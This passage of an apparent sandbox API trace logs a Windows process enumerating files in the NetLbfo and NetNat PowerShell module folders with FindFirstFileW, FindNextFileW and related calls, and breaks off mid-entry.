dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.100] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10ffca0f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10ffca0f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10ffca0f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1b9d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetLbfoTeam.cdxml", cAlternateFileName="")) returned 1 [0265.100] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb9d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetLbfoTeam.format.ps1xml", cAlternateFileName="")) returned 1 [0265.100] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1684, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetLbfoTeamMember.cdxml", cAlternateFileName="")) returned 1 [0265.100] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b5, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetLbfoTeamMember.format.ps1xml", cAlternateFileName="")) returned 1 [0265.100] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetLbfoTeamNic.cdxml", cAlternateFileName="")) returned 1 [0265.100] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1270, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetLbfoTeamNic.format.ps1xml", cAlternateFileName="")) returned 1 [0265.100] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11048ec0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x432, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetLbfo.psd1", cAlternateFileName="")) returned 1 [0265.101] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2163, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetLbfo.Types.ps1xml", cAlternateFileName="")) returned 1 [0265.101] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0265.101] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0265.101] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0265.101] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0265.101] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetLbfo", nBufferLength=0x105, lpBuffer=0x1b81e100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetLbfo", lpFilePart=0x0) returned 0x3a [0265.101] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e540) returned 1 [0265.101] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetLbfo" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netlbfo"), fInfoLevelId=0x0, lpFileInformation=0x1b81e620 | out: lpFileInformation=0x1b81e620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0265.101] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e500) returned 1 [0265.101] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e570) returned 1 [0265.101] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetLbfo", nBufferLength=0x105, lpBuffer=0x1b81e060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetLbfo", lpFilePart=0x0) returned 0x3a [0265.101] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetLbfo\\", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetLbfo\\", lpFilePart=0x0) returned 0x3b [0265.102] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetLbfo\\*", lpFindFileData=0x1b81e210 | out: lpFindFileData=0x1b81e210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0265.102] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.102] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10ffca0f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10ffca0f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10ffca0f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1b9d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetLbfoTeam.cdxml", cAlternateFileName="")) returned 1 [0265.102] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb9d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetLbfoTeam.format.ps1xml", cAlternateFileName="")) returned 1 [0265.102] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1684, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetLbfoTeamMember.cdxml", cAlternateFileName="")) returned 1 [0265.102] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b5, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetLbfoTeamMember.format.ps1xml", cAlternateFileName="")) returned 1 [0265.103] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetLbfoTeamNic.cdxml", cAlternateFileName="")) returned 1 [0265.103] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1270, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetLbfoTeamNic.format.ps1xml", cAlternateFileName="")) returned 1 [0265.103] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11048ec0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x432, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetLbfo.psd1", cAlternateFileName="")) returned 1 [0265.103] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2163, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetLbfo.Types.ps1xml", cAlternateFileName="")) returned 1 [0265.104] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2163, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetLbfo.Types.ps1xml", cAlternateFileName="")) returned 0 [0265.104] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0265.104] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e4c0) returned 1 [0265.104] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e480) returned 1 [0265.104] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetLbfo\\NetLbfo.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netlbfo\\netlbfo.psd1")) returned 0x20 [0265.104] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0265.104] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetNat", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetNat", lpFilePart=0x0) returned 0x39 [0265.104] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetNat\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetNat\\", lpFilePart=0x0) returned 0x3a [0265.104] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetNat\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0265.105] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.105] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1725, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetNat.cdxml", cAlternateFileName="")) returned 1 [0265.105] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ca9, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetNat.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.105] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetNat.Types.ps1xml", cAlternateFileName="")) returned 1 [0265.106] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd51, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetNatExternalAddress.cdxml", cAlternateFileName="")) returned 1 [0265.106] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x502, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetNatGlobal.cdxml", cAlternateFileName="")) returned 1 [0265.106] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetNatSession.cdxml", cAlternateFileName="")) returned 1 [0265.106] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x118d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetNatStaticMapping.cdxml", cAlternateFileName="")) returned 1 [0265.106] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetNat.psd1", cAlternateFileName="")) returned 1 [0265.106] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetNat.psd1", cAlternateFileName="")) returned 0 [0265.107] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0265.107] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0265.107] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0265.107] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0265.107] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetNat", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetNat", lpFilePart=0x0) returned 0x39 [0265.107] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetNat\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetNat\\", lpFilePart=0x0) returned 0x3a [0265.107] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetNat\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbce0 [0265.107] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.108] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1725, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetNat.cdxml", cAlternateFileName="")) returned 1 [0265.108] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ca9, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetNat.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.108] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetNat.Types.ps1xml", cAlternateFileName="")) returned 1 [0265.109] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd51, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetNatExternalAddress.cdxml", cAlternateFileName="")) returned 1 [0265.109] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x502, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetNatGlobal.cdxml", cAlternateFileName="")) returned 1 [0265.109] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, 